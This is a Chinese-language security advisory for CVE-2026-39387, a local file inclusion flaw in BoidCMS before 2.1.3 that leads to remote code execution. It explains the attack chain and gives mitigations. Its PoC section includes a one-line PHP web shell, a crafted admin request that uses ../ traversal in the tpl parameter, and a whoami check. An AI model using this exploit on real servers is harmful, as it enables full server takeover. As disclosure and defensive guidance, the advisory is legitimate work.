CVE-2026-39387 CVSS 7.2 高危

CVE-2026-39387: BoidCMS 本地文件包含致远程代码执行漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39387

漏洞类型

远程代码执行 (RCE)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

BoidCMS

漏洞概述

BoidCMS 2.1.3之前的版本存在严重的本地文件包含（LFI）漏洞。由于应用程序未对tpl参数进行充分清理，攻击者可利用路径遍历序列包含任意文件。结合文件上传功能，经过身份验证的管理员可上传恶意文件并通过LFI触发执行，从而导致服务器被完全控制。该漏洞已在2.1.3版本中修复。

技术细节

该漏洞的核心在于BoidCMS在处理页面创建和更新功能时，未能对用户输入的tpl（模板）参数进行严格的路径验证和过滤。该参数被直接传递至PHP的require_once()函数中执行。拥有管理员权限的攻击者可以利用此缺陷，在tpl参数中注入路径遍历字符（例如../），从而逃逸出预定的主题目录，读取或包含服务器上的任意文件。为了实现远程代码执行（RCE），攻击者可以结合系统的文件上传功能。首先，上传一个伪装成图片但内嵌恶意PHP代码的文件到服务器的media/目录。接着，利用LFI漏洞，通过require_once()包含该恶意文件。这将导致Web服务器解析并执行其中的PHP代码，从而赋予攻击者完全的服务器控制权限。

攻击链分析

STEP 1

1. 身份认证

攻击者需要获取管理员级别的账户凭据，因为利用该漏洞需要高权限 (PR:H)。

STEP 2

2. 上传恶意文件

利用系统的文件上传功能，上传一个包含恶意PHP代码的文件（通常伪装成图片格式）到服务器的 media/ 目录。

STEP 3

3. 路径遍历 (LFI)

在页面更新或创建请求中，修改 tpl 参数，注入 '../' 序列以遍历目录，指向 media/ 目录下刚上传的恶意文件。

STEP 4

4. 代码执行 (RCE)

应用程序将恶意文件路径传递给 require_once()，导致Web服务器解析并执行其中的PHP代码，从而实现远程代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Step 1: Upload a malicious file (e.g., image with PHP code) to the media directory.
// File: media/exploit.png
// Content: <?php system($_GET['cmd']); ?>

// Step 2: Trigger the LFI by sending a crafted request with the tpl parameter.
// Endpoint requires authentication (Admin).
POST /admin/index.php HTTP/1.1
Host: vulnerable-site.com
Cookie: PHPSESSID=[admin_session_id]
Content-Type: application/x-www-form-urlencoded

title=PoC&content=Testing&tpl=../media/exploit.png

// Result: The server executes code inside exploit.png.
// Verify RCE by visiting: http://vulnerable-site.com/?cmd=whoami

影响范围

BoidCMS < 2.1.3

防御指南

临时缓解措施

建议立即将BoidCMS升级至v2.1.3或更高版本以修复此漏洞。如果无法立即升级，应严格限制管理员账户的访问权限，并检查服务器日志中是否存在异常的tpl参数请求。此外，可以通过配置Web服务器（如Nginx/Apache），禁止解析media/目录下的PHP文件，以阻断利用链中的代码执行环节。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表